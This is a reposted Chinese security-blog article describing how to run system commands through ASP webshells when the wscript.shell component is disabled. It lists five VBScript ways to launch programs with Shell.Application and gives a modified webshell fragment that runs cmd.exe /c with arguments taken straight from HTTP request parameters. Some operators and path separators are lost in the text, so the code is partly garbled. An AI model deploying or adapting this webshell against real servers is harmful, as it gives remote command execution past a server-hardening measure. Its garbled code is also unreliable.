wscript.shell组件被禁用时 可以用Shell.Application执行命令

站长说明：

    非常非常老的文章了，又翻出来看了看，觉得比较有用，就转出来了。

    wscript.shell 和 shell.application 这两个组件都是来执行程序的，因此是最不安全的组件。目前很多asp木马执行命令都是用的 wscript.shell ，忽略了 shell.application 。

    我们可以首先在一个具有运行权限的目录上传一个bat文件，里面写上我们要运行的命令。然后调用 shell.application 组件运行这个bat。回显可以在bat中用重定向符号 > 到一个文本文件，想看命令的结果去读这个文件就可以了。当然也可以直接调用cmd执行命令。

    抄 lcx 在 VBS 中 shell.application 运行文件的5种方法。

Set objShellApp = CreateObject("Shell.Application")
Set objFolder = objShellApp.NameSpace("c:")

objFolder.Items().item("demo.exe").invokeverb '方法1

objFolder.Items().item("demo.exe").InvokeVerbEx'方法2

objShellApp.Open("C:demo.exe") '方法3

objShellApp.ShellExecute "demo.exe","","c:","","1" '方法4,可以加参数和设置参数值

'方法5
Set objFolderItem = objShellApp.NameSpace("C:").Items().item("demo.exe")
Set objFIVs = objFolderItem.Verbs()
For i=0 To objFIVs.Count - 1
    'MsgBox objFIVs.Item(i)
Set objFIV = objFIVs.Item(i)
If objFIV.Name = "打开(&O)" Then '右键菜单中在中文系统是"打开(&O)"，英文自己改
        objFIV.DoIt
        Exit For
   End IF
Next

    改写下lcx的海洋2006。不认识代码啊，修改半天弄出一个不带回显的，用重定向自己去看吧。XP下测试成功。

On Error Resume Next
Dim theFile, thePath, appPath, appName, appArgs
appPath = Trim(Request("appPath"))
appName = Trim(Request("appName"))
appArgs = Trim(Request("appArgs"))

If appName = "" Then
appName = "cmd.exe"
End If
 
If appPath "" And Right(appPath, 1) "" Then
appPath = appPath & ""
End If
 
If LCase(appName) = "cmd.exe" And appArgs "" Then
If LCase(Left(appArgs, 2)) "/c" Then
appArgs = "/c " & appArgs
End If
Else
If LCase(appName) = "cmd.exe" And appArgs = "" Then
appArgs = "/c "
End If
End If

Set objShellApp = CreateObject("Shell.Application")
objShellApp.ShellExecute appName, appArgs, appPath, "", 0
%>

留言评论（旧系统）：

文章来源于lcx.cc:wscript.shell组件被禁用时 可以用Shell.Application执行命令